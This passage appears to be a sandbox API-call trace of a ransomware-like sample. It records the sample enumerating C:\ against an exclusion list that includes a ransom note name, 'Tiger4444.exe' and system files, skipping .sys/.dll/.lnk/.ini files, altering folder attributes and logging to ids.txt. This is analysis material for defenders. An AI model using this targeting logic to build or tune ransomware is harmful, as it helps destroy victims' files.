[0038.141] WriteFile (in: hFile=0x290, lpBuffer=0x30ad238*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x30abefc, lpOverlapped=0x0 | out: lpBuffer=0x30ad238*, lpNumberOfBytesWritten=0x30abefc*=0x2d, lpOverlapped=0x0) returned 1 [0038.143] CloseHandle (hObject=0x290) returned 1 [0038.144] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0038.144] CloseHandle (hObject=0x0) returned 0 [0038.144] CloseHandle (hObject=0xffffffff) returned 1 [0038.144] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="Tiger4444.exe") returned -1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="bootmgr") returned 1 [0038.144] lstrcmpiW (lpString1="Documents and Settings", lpString2="pagefile.sys") returned -1 [0038.145] lstrcmpiW (lpString1="Documents and Settings", lpString2="boot") returned 1 [0038.145] lstrcmpiW (lpString1="Documents and Settings", lpString2="ids.txt") returned -1 [0038.145] lstrcmpiW (lpString1="Documents and Settings", lpString2="NTUSER.DAT") returned -1 [0038.145] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Documents and Settings" | out: lpString1="Documents and Settings") returned="Documents and Settings" [0038.145] SetFileAttributesW (lpFileName="C:\\Documents and Settings", dwFileAttributes=0x2412) returned 1 [0038.145] wsprintfA (in: param_1=0x30ae2a8, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Documents and Settings\r\n") returned 44 [0038.145] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Documents and Settings\r\n") returned 44 [0038.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x290 [0038.146] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x457 [0038.146] WriteFile (in: hFile=0x290, lpBuffer=0x30ae2a8*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x30ada64, lpOverlapped=0x0 | out: lpBuffer=0x30ae2a8*, lpNumberOfBytesWritten=0x30ada64*=0x2c, lpOverlapped=0x0) returned 1 [0038.147] CloseHandle (hObject=0x290) returned 1 [0038.148] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0038.148] lstrcmpiW (lpString1="ESD", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.148] lstrcmpiW (lpString1="ESD", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.148] lstrcmpiW (lpString1="ESD", lpString2="Tiger4444.exe") returned -1 [0038.148] lstrcmpiW (lpString1="ESD", lpString2=".") returned 1 [0038.148] lstrcmpiW (lpString1="ESD", lpString2="..") returned 1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="windows") returned -1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="bootmgr") returned 1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="pagefile.sys") returned -1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="boot") returned 1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="ids.txt") returned -1 [0038.149] lstrcmpiW (lpString1="ESD", lpString2="NTUSER.DAT") returned -1 [0038.149] lstrcpyW (in: lpString1=0x30aeaae, lpString2="ESD" | out: lpString1="ESD") returned="ESD" [0038.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66680 [0038.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe) returned 0xc73ba0 [0038.149] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66688 | out: ListHead=0xc66828, ListEntry=0xc66688) returned 0xc663e8 [0038.149] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Tiger4444.exe") returned -1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootmgr") returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="pagefile.sys") returned -1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot") returned 1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ids.txt") returned -1 [0038.149] lstrcmpiW (lpString1="hiberfil.sys", lpString2="NTUSER.DAT") returned -1 [0038.149] lstrcpyW (in: lpString1=0x30aeaae, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0038.149] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x2022) returned 0 [0038.149] SetFileAttributesW (lpFileName="C:\\hiberfil.sys", dwFileAttributes=0x2006) returned 0 [0038.149] lstrlenW (lpString="hiberfil.sys") returned 12 [0038.149] lstrlenW (lpString="Tiger4444") returned 9 [0038.149] lstrcmpiW (lpString1="erfil.sys", lpString2="Tiger4444") returned -1 [0038.149] lstrlenW (lpString=".dll") returned 4 [0038.149] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0038.149] lstrlenW (lpString=".lnk") returned 4 [0038.149] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0038.149] lstrlenW (lpString=".ini") returned 4 [0038.149] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0038.150] lstrlenW (lpString=".sys") returned 4 [0038.150] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0038.150] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="Tiger4444.exe") returned -1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="windows") returned -1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="bootmgr") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="pagefile.sys") returned -1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="boot") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="ids.txt") returned 1 [0038.150] lstrcmpiW (lpString1="Logs", lpString2="NTUSER.DAT") returned -1 [0038.150] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Logs" | out: lpString1="Logs") returned="Logs" [0038.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665e0 [0038.150] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x10) returned 0xc73d38 [0038.150] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665e8 | out: ListHead=0xc66828, ListEntry=0xc665e8) returned 0xc66688 [0038.150] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="Tiger4444.exe") returned -1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootmgr") returned 1 [0038.150] lstrcmpiW (lpString1="pagefile.sys", lpString2="pagefile.sys") returned 0 [0038.150] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="Tiger4444.exe") returned -1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="bootmgr") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="pagefile.sys") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="ids.txt") returned 1 [0038.150] lstrcmpiW (lpString1="PerfLogs", lpString2="NTUSER.DAT") returned 1 [0038.150] lstrcpyW (in: lpString1=0x30aeaae, lpString2="PerfLogs" | out: lpString1="PerfLogs") returned="PerfLogs" [0038.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66380 [0038.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc664a0 [0038.151] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66388 | out: ListHead=0xc66828, ListEntry=0xc66388) returned 0xc665e8 [0038.151] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x6b09cda7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x6b09cda7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="Tiger4444.exe") returned -1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="bootmgr") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="pagefile.sys") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="ids.txt") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files", lpString2="NTUSER.DAT") returned 1 [0038.151] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0038.151] SetFileAttributesW (lpFileName="C:\\Program Files", dwFileAttributes=0x10) returned 1 [0038.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66640 [0038.151] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x22) returned 0xc7c5c8 [0038.151] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66648 | out: ListHead=0xc66828, ListEntry=0xc66648) returned 0xc66388 [0038.151] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7511354, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe7511354, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Tiger4444.exe") returned -1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="windows") returned -1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="bootmgr") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="pagefile.sys") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="boot") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ids.txt") returned 1 [0038.151] lstrcmpiW (lpString1="Program Files (x86)", lpString2="NTUSER.DAT") returned 1 [0038.151] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0038.152] SetFileAttributesW (lpFileName="C:\\Program Files (x86)", dwFileAttributes=0x10) returned 1 [0038.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66500 [0038.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2e) returned 0xc67720 [0038.152] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66508 | out: ListHead=0xc66828, ListEntry=0xc66508) returned 0xc66648 [0038.152] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x786b654e, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x786b654e, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="Tiger4444.exe") returned -1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2=".") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="..") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="windows") returned -1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="bootmgr") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="pagefile.sys") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="boot") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="ids.txt") returned 1 [0038.152] lstrcmpiW (lpString1="ProgramData", lpString2="NTUSER.DAT") returned 1 [0038.152] lstrcpyW (in: lpString1=0x30aeaae, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0038.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66480 [0038.152] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1e) returned 0xc6f858 [0038.152] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66488 | out: ListHead=0xc66828, ListEntry=0xc66488) returned 0xc66508 [0038.152] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="Tiger4444.exe") returned -1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0038.152] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0038.153] lstrcmpiW (lpString1="Recovery", lpString2="NTUSER.DAT") returned 1 [0038.153] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0038.153] SetFileAttributesW (lpFileName="C:\\Recovery", dwFileAttributes=0x2012) returned 1 [0038.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663c0 [0038.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc66400 [0038.154] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc663c8 | out: ListHead=0xc66828, ListEntry=0xc663c8) returned 0xc66488 [0038.154] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x47384f2, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="Tiger4444.exe") returned -1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2=".") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="..") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="windows") returned -1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="bootmgr") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="pagefile.sys") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="boot") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="ids.txt") returned 1 [0038.154] lstrcmpiW (lpString1="swapfile.sys", lpString2="NTUSER.DAT") returned 1 [0038.154] lstrcpyW (in: lpString1=0x30aeaae, lpString2="swapfile.sys" | out: lpString1="swapfile.sys") returned="swapfile.sys" [0038.154] SetFileAttributesW (lpFileName="C:\\swapfile.sys", dwFileAttributes=0x22) returned 0 [0038.154] SetFileAttributesW (lpFileName="C:\\swapfile.sys", dwFileAttributes=0x6) returned 0 [0038.154] lstrlenW (lpString="swapfile.sys") returned 12 [0038.154] lstrlenW (lpString="Tiger4444") returned 9 [0038.154] lstrcmpiW (lpString1="pfile.sys", lpString2="Tiger4444") returned -1 [0038.154] lstrlenW (lpString=".dll") returned 4 [0038.154] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0038.154] lstrlenW (lpString=".lnk") returned 4 [0038.154] lstrcmpiW (lpString1=".sys", lpString2=".lnk") returned 1 [0038.154] lstrlenW (lpString=".ini") returned 4 [0038.154] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0038.154] lstrlenW (lpString=".sys") returned 4 [0038.154] lstrcmpiW (lpString1=".sys", lpString2=".sys") returned 0 [0038.154] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0038.154] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="Tiger4444.exe") returned -1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0038.155] lstrcmpiW (lpString1="System Volume Information", lpString2="NTUSER.DAT") returned 1 [0038.155] lstrcpyW (in: lpString1=0x30aeaae, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0038.155] SetFileAttributesW (lpFileName="C:\\System Volume Information", dwFileAttributes=0x12) returned 1 [0038.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66460 [0038.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3a) returned 0xc627e8 [0038.155] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66468 | out: ListHead=0xc66828, ListEntry=0xc66468) returned 0xc663c8 [0038.155] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="Tiger4444.exe") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2=".") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="..") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="windows") returned -1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="bootmgr") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="pagefile.sys") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="boot") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="ids.txt") returned 1 [0038.155] lstrcmpiW (lpString1="Users", lpString2="NTUSER.DAT") returned 1 [0038.155] lstrcpyW (in: lpString1=0x30aeaae, lpString2="Users" | out: lpString1="Users") returned="Users" [0038.155] SetFileAttributesW (lpFileName="C:\\Users", dwFileAttributes=0x10) returned 1 [0038.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0038.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x12) returned 0xc66360 [0038.156] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc66468 [0038.156] FindNextFileW (in: hFindFile=0xc72dc8, lpFindFileData=0x30adf58 | out: 